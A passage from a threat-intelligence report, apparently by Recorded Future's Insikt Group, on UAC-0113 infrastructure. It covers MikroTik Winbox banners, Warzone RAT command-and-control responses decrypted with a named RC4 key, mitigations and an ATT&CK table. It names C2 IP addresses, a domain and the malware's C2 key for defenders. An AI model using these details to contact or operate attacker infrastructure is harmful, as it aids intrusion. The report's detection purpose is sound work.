_Figure 23: Screenshot of the contents of the 3_ЗАЯВА-на-отримання-компенсації-додаткової-знижки-сімям-загиблих2.doc file (Source: Recorded Future)_

###### Port 8291

Analysis of the 2 IP addresses revealed that both have port [8291 open and return a "MikroTik WinBox" banner](https://beta.shodan.io/host/94.158.156.4). MikroTik Winbox is an application to aid in the administering of MikroTik RouterOS devices[^4]. Sandworm has historically exploited MikroTik routers as part of the wide-scale botnets known as VPNFilter and Cyclops Blink.
VPNFilter, which was initially [identified in June 2018](https://arstechnica.com/information-technology/2018/06/vpnfilter-malware-infecting-50000-devices-is-worse-than-we-thought/), and Cyclops Blink, [which was discovered in February 2022](https://arstechnica.com/information-technology/2022/02/russias-most-cut-throat-hackers-infect-network-devices-with-new-botnet-malware/), affected MikroTik routers as well as a wide range of routing devices produced by other manufacturers.

Banner from 94[.]158[.]156[.]4:

```
MikroTik Winbox:
index:
advtool.dll: 6.49.6
dhcp.dll: 6.49.6
hotspot.dll: 6.49.6
mpls.dll: 6.49.6
pim.dll: 6.49.6
ppp.dll: 6.49.6
roteros.dll: 6.49.6
roting4.dll: 6.49.6
secure.dll: 6.49.6
system.dll: 6.49.6
wlan6.dll: 6.49.6
list:
advtool.jg: 6.49.6
dhcp.jg: 6.49.6
hotspot.jg: 6.49.6
icons.png: 6.49.6
icons24.png:
icons32.png:
mpls.jg: 6.49.6
pim.jg: 6.49.6
ppp.jg: 6.49.6
roteros.jg: 6.49.6
roting4.jg: 6.49.6
secure.jg: 6.49.6
wlan6.jg: 6.49.6
```

Banner from 91[.]200[.]114[.]141:

```
MikroTik Winbox:
index:
advtool.dll: 6.46.8
dhcp.dll: 6.46.8
hotspot.dll: 6.46.8
mpls.dll: 6.46.8
ppp.dll: 6.46.8
roteros.dll: 6.46.8
roting4.dll: 6.46.8
secure.dll: 6.46.8
system.dll: 6.46.8
wlan6.dll: 6.46.8
list:
advtool.jg: 6.46.8
dhcp.jg: 6.46.8
hotspot.jg: 6.46.8
icons.png: 6.46.8
mpls.jg: 6.46.8
ppp.jg: 6.46.8
roteros.jg: 6.46.8
roting4.jg: 6.46.8
secure.jg: 6.46.8
wlan6.jg: 6.46.8
```

_[Figures 24 and 25: "MikroTik Winbox" banners on port 8291. Left: 94[.]158[.]156[.]4; Right: 91[.]200[.]114[.]141 (Source: Shodan)](https://beta.shodan.io/host/94.158.156.4)_

###### Port 443

IP address 94[.]158[.]156[.]4, linked to darkfox[.]ddns[.]net, also had port 443 open. Analysis of port 443 returns 12 bytes of data, which is consistent with known [Warzone RAT](https://research.checkpoint.com/2020/warzone-behind-the-enemy-lines/) server responses.
05 38 6b f4 62 f4 9f 3f 35 2f 6e e6 _Figure 26: Bytes returned from 94[.]158[.]156[.]4 on port 443 (Source: Recorded Future)_ Further analysis of the Warzone RAT sample jfilyg7.exe revealed that it uses a custom implementation of the RC4 cipher with a decryption key of “nevergonnagiveyouup” for C2 communications. Inskit Group was able to decrypt the bytes returned by the Warzone Rat C2 hosted on IP address 94[.]158[.]156[.]4 via the custom RC4 cipher with the key shown 4 https://whatportis.com/ports/8291_winbox-default-on-a-mikrotikrouteros-for-a-windows-application-used-to-administer-mikrotik-routeros in Figure 27. The decrypted bytes conform to the expected [packet structure previously reported by Checkpoint.](https://research.checkpoint.com/2020/warzone-behind-the-enemy-lines/) 29 bb 66 e4 00 00 00 00 00 00 00 00 _Figure 27: Decrypted bytes returned from 94[.]158[.]156[.]4 on port 443 (Source: Recorded Future)_ ##### Mitigations The delivery of Warzone RAT and Colibri Loader, along with their C2 communication, is best detected using intrusion detection systems (IDS) like Snort. Users should conduct the following measures to detect and mitigate activity associated with these pieces of malware: - Configure your intrusion detection systems (IDS), intrusion prevention systems (IPS), or any network defense mechanisms in place to alert on — and upon review, consider blocking connection attempts to and from — the external IP addresses and domains listed in the appendix. - Recorded Future Hunting Packages can be used to hunt for the presence of malicious files associated with Warzone RAT and Colibri Loader. YARA rules for each malware family can be found in Appendix D. - Recorded Future proactively detects malicious server configurations and provides means to block them in the Command and Control Security Control Feed. The Command and Control Feed includes tools used by UAC-0113 and other Russian state-sponsored threat activity groups. 
Recorded Future clients should alert on and block these C2 servers to allow for detection and remediation of active intrusions.
- Recorded Future Threat Intelligence (TI), [Third-Party Intelligence, and SecOps Intelligence module](https://www.recordedfuture.com/license-options/) users can monitor real-time output from Network Traffic Analysis analytics to identify suspected targeted intrusion activity involving your organization or key vendors and partners.
- Monitor for domain abuse, such as typosquat domains spoofing your organization, through the [Recorded Future Brand Intelligence (BI) module](https://www.recordedfuture.com/license-options/). The SecurityTrails extension is available to any customer with a subscription to the Threat Intelligence or Brand Intelligence modules. The LogoType source and alerting are exclusive to the BI module, though the TI module does have access to the data via the Advanced Query Builder.

-----

##### Outlook

Insikt Group continues to track UAC-0113 infrastructure, observing changes in TTPs as its operations diversify across Ukraine, this time with a significant focus on
telecommunication providers. There has been a notable continuation of the use of publicly available commodity malware, showing that UAC-0113 is adapting its operations with a willingness to use a variety of tooling. Readers should detect, block, and hunt for the presence of the indicators referenced in connection with UAC-0113 reporting via the Recorded Future Platform in their network monitoring, intrusion detection systems, firewalls, and any associated perimeter security appliances.

-----

##### Appendix A — Indicators

IP Addresses:

Domains:

Files and Hashes:

-----

##### Appendix B — Maltego Chart of Infrastructure and Files

-----

##### Appendix C — MITRE ATT&CK Techniques

|Tactic: Technique|ATT&CK Code|
|---|---|
|Command and Control: Dynamic Resolution|T1568|
|Command and Control: Non-Application Layer Protocol|T1095|
|Command and Control: Web Service|T1102|
|Defense Evasion: Hide Artifacts: Hidden Files and Directories|T1564.001|
|Defense Evasion: Hide Artifacts: Hidden Window|T1564.003|
|Defense Evasion: Hide Artifacts: NTFS File Attributes|T1564.004|
|Defense Evasion: Obfuscated Files or Information: HTML Smuggling|T1027.006|
|Defense Evasion: Process Injection: Process Hollowing|T1055.012|
|Execution: Command and Scripting Interpreter: PowerShell|T1059.001|
|Execution: Command and Scripting Interpreter: Windows Command Shell|T1059.003|
|Execution: User Execution|T1204|
|Execution: Windows Management Instrumentation|T1047|
|Persistence: Hijack Execution Flow: Path Interception by Search Order Hijacking|T1574.008|
|Persistence: Registry Run Keys / Startup Folder|T1547.001|
|Persistence: Scheduled Task|T1053.005|
|Resource Development: Acquire Infrastructure|T1583|

-----

##### Appendix D — YARA Rules

###### MAL_Colibri_Loader.yar

-----

###### MAL_WarzoneRAT.yar

-----

Data sources for this report include the Recorded Future® Platform, SecurityTrails, DomainTools, PolySwarm, Farsight, Shodan, BinaryEdge, Censys, Hatching Triage, and other open-source tools and techniques.

About Insikt Group®

Insikt Group is Recorded Future’s threat research division, comprising analysts and security researchers with deep government, law enforcement, military, and intelligence agency experience.
Their mission is to produce intelligence on a range of cyber and geopolitical threats that reduces risk for clients, enables tangible outcomes, and prevents business disruption. Coverage areas include research on state-sponsored threat groups; financially motivated threat actors on the darknet and criminal underground; newly emerging malware and attacker infrastructure; strategic geopolitics; and influence operations.

About Recorded Future®

Recorded Future is the world’s largest intelligence company. Recorded Future’s cloud-based Intelligence Platform provides the most complete coverage across adversaries, infrastructure, and targets. By combining persistent and pervasive automated data collection and analytics with human analysis, Recorded Future provides real-time visibility into the vast digital landscape and empowers clients to take proactive action to disrupt adversaries and keep their people, systems, and infrastructure safe. Headquartered in Boston with offices and employees around the world, Recorded Future works with more than 1,400 businesses and government organizations across more than 60 countries. Learn more at recordedfuture.com and follow us on Twitter at @RecordedFuture.

-----